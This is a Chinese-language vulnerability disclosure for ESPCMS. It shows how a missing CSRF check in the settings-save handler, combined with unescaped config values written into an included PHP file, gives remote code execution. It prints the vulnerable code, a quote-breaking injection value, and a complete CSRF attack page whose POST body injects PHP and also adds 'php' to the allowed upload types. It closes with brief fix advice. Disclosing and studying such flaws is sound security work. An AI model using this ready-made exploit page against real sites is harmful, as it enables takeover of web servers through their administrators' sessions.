### 简要描述: espcms 最新版本 CSRF 直接 getshell ### 详细说明: 先看存在问题的代码。management.php (lines 711-741) 中的 onsetsave() 是后台"保存系统设置"的处理函数。从贴出的代码看，它只用 filemode() 检查了 datacache/command.php 是否可写，没有任何 CSRF token / Referer 校验；它把每个 POST 参数（accept($rsList['valname'], 'P')）逐项写入 config 表，最后调用 systemfile(true) 重新生成配置缓存文件： ``` function onsetsave() { $db_table = db_prefix . 'config'; $commandfile = admin_ROOT . 'datacache/command.php'; if (!$this->fun->filemode($commandfile)) { exit('false'); } $old_ishtml = $this->CON['is_html']; $sql = 'SELECT * FROM ' . $db_table . ' WHERE groupid<=8 AND isline=0 ORDER BY groupid'; $rs = $this->db->query($sql); while ($rsList = $this->db->fetch_assoc($rs)) { if ($rsList['groupid'] == 5 && !$this->get_app_view('bbs', 'isetup')) { continue; } if ($rsList['groupid'] == 7 && !$this->get_app_view('touch', 'isetup')) { continue; } if ($rsList['groupid'] == 8 && !$this->get_app_view('im', 'isetup')) { continue; } $db_set = "value='" . $this->fun->accept($rsList['valname'], 'P') . "'"; $db_where = 'id=' . $rsList['id']; $this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where); } $this->db->query("UPDATE $db_table SET value='" . admin_URL . "' WHERE valname='domain'"); $this->systemfile(true); ``` 函数末尾的 $this->systemfile(true) 才是关键，跟进去看 class_connector.php (lines 514-543)： ``` function systemfile($trueclass = false) { $commandfile = admin_ROOT . 'datacache/command.php'; $varget = "4:'1T<#HO+W=W=RYE8VES<\"YC;B\`"; if (!is_file($commandfile) || $trueclass) { $sConfig = "<?php\n"; $sConfig = $sConfig . '// uptime:' . date('Y-m-d H:i:s', time()) . "\n"; $sConfig = $sConfig . "// ECISP.CN \n"; $sConfig = $sConfig . "\$CONFIG=Array(\n"; $db_table = db_prefix . 'config'; $sql = "SELECT valname,content,value,valtype FROM $db_table where isline=0 ORDER BY groupid"; $rs = $this->db->query($sql); while ($rsList = $this->db->fetch_assoc($rs)) { $valname = $rsList['valname']; $value = $rsList['value']; $valtype = $rsList['valtype']; $content = $rsList['content']; if ($valtype == 'int' || $valtype == 'bool') { $value = empty($value) ? 0 : $value; $sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>' . $value . 
",\n"; } else { $sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>\'' . $value . "',\n"; } } $sConfig = $sConfig . ")\n"; $sConfig = $sConfig . '?' . '>'; if (!$this->fun->filewrite($commandfile, $sConfig)) { exit('System File Error!'); } } include $commandfile; ``` 到这里就清楚了：systemfile() 把 config 表里的 value 原封不动地拼进 PHP 源码，用 filewrite() 写成 datacache/command.php，然后直接 include 进来。对于非 int/bool 类型的配置项，value 被放在一对单引号之间，没有任何转义（既没有 addslashes，也没有用 var_export 生成）。举例分析：如果把某项配置设为 sss'，gpc（或 accept() 内部的转义）会把它转义成 sss\' 存入数据库；但从数据库再取出来时得到的又是 sss'，也就是说写配置文件这一步对单引号等特殊字符等于完全没有处理。于是提交 '+phpinfo(),// 这样的值，生成出来的那一行就是 'close_content'=>'...'+phpinfo(),//', ——单引号被闭合、行尾残余被 // 注释掉，文件仍然是合法 PHP，注入的代码随 include 执行。 直接看操作：在后台系统设置里把 close_content 填成带单引号闭合和 PHP 代码的值并保存： [<img src="https://images.seebug.org/upload/201409/111429125550a12c5eece093ed4bb64bc388b2d1.png" alt="15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/111429125550a12c5eece093ed4bb64bc388b2d1.png) 再访问生成的 command.php 看效果： [<img src="https://images.seebug.org/upload/201409/11143004260d507b04d51f599d1554c486206d65.png" alt="16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/11143004260d507b04d51f599d1554c486206d65.png) 成功执行。下面是 CSRF 攻击页面：已登录的管理员打开它，浏览器会带着后台 cookie（withCredentials）向 setsave 发出这个 POST；Content-Type 是 application/x-www-form-urlencoded，不会触发 CORS 预检，所以即使跨域读不到响应，请求本身也会到达服务端并被处理。 ``` <html> <body> <script> function csrf_shell(){ var xhr = new XMLHttpRequest(); xhr.open("POST", "http://192.168.10.70/ESPCMSV6000140909_INSTALLhttps://images.seebug.org/upload/adminsoft/index.php?archive=management&action=setsave", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = "true"; var
body='is_close=0&close_content=%E6%8A%B1%E6%AD%89%EF%BC%9A%E7%BD%91%E7%AB%99%E6%AD%A3%E5%9C%A8%E7%BB%B4%E6%8A%A4%E4%B8%AD%EF%BC%8C%E7%BB%99%E6%82%A8%E5%B8%A6%E6%9D%A5%E4%B8%8D%E4%BE%BF%E6%B7%B1%E8%A1%A8%E6%AD%89%E6%84%8F%EF%BC%81'%2Bphpinfo()%2C%2F%2F&icpbeian=&sitename=test&admine_mail=admin%40admin.com&is_log=1&is_gzip=1&cli_time=8&default_lng=cn&is_alonelng=0&home_lng=cn&is_html=0&is_rewrite=0&file_fileex=html&entrance_file=index&file_htmldir=html%2F&is_getcache=0&is_caching=0&cache_time=3600&http_pathtype=1&member_menu=1&mem_isclose=1&mem_isseccode=1&mem_regisseccode=0&mem_isemail=0&mem_lock=www%2Cbbs%2Cdemo%2Ctest%2Cftp%2Cmail%2Cuser%2Cusers%2Cadmin%2Cadministrator&mem_isclass=0&mem_did=cn%3A0%2Cen%3A0&mem_isaddress=0&mem_isucenter=0&mem_ucdbhost=localhost&mem_ucdbuser=root&mem_ucdbpw=&mem_ucdbname=ucenter&mem_ucdbchart=utf8&mem_ucdbtable=uc_&mem_uckey=sdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mem_ucapi=&mem_ucchart=utf-8&mem_ucapiid=0&enquiry_menu=1&is_enquiry_memclass=0&order_menu=1&order_ismember=1&order_integral=10&order_discount=100&order_snfont=ESP-&order_moneytype=%EF%BF%A5&order_max_list=3&order_companyname=&order_contact=&order_province=&order_city=&order_add=&order_post=&order_tel=&order_moblie=&upfile_pictype=jpg%7Cpng%7Cgif%7Cphp&uifile_movertype=swf%7Cmpg%7Cflv%7Cmp4&upfile_filetype=zip%7Crar%7Cdoc%7Cxls%7Cpdf&upfile_maxsize=100000000&img_dirtype=m3&img_cfiletype=d&img_width=200&img_height=200&img_bgcolor=%23ffffff&img_quality=80&img_issmallpic=0&img_iszoom=1&img_iswater=0&img_wmt_text=ESPCMS&img_wmt_size=25&img_wmt_color=%23ffffff&img_wmt_pos=9&img_wmt_transparent=20&img_wmi_file=watermark.png&img_wmi_pos=9&img_wmi_transparent=50&input_isdes=1&input_isdescription=250&input_isdellink=0&is_inputclose=1&input_click=0&is_keylink=1&input_color=%23000000&is_email=0&smtp_type=2&mail_cat=1&smtp_server=&smtp_port=25&mail_send=&smtp_username=&smtp_password=&is_moblie=0&moblie_userid=&moblie_smssnid=&moblie_smskey=&moblie_number=&sitecoedb=7a6355a4a18b136036439cc61ef
e069b&scode_bgcolor=%230080ff&scode_fontcolor=%23ffffff&scode_adulterate=1&scode_shadow=0&tip_searchtime=10'; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } csrf_shell(); </script> </body> </html> ``` 到此为止。补充两点：一是上面的请求体里 upfile_pictype=jpg%7Cpng%7Cgif%7Cphp 顺手把 php 加进了允许上传的图片后缀，很可能构成另一条上传 getshell 的路径（本文未验证）；二是修复至少要做两件事——给 setsave 这类写操作加上 CSRF token 校验，以及在 systemfile() 生成 command.php 时用 var_export()/addslashes() 之类的方式转义 value，而不是把数据库内容原样拼进 PHP 源码。 ### 漏洞证明: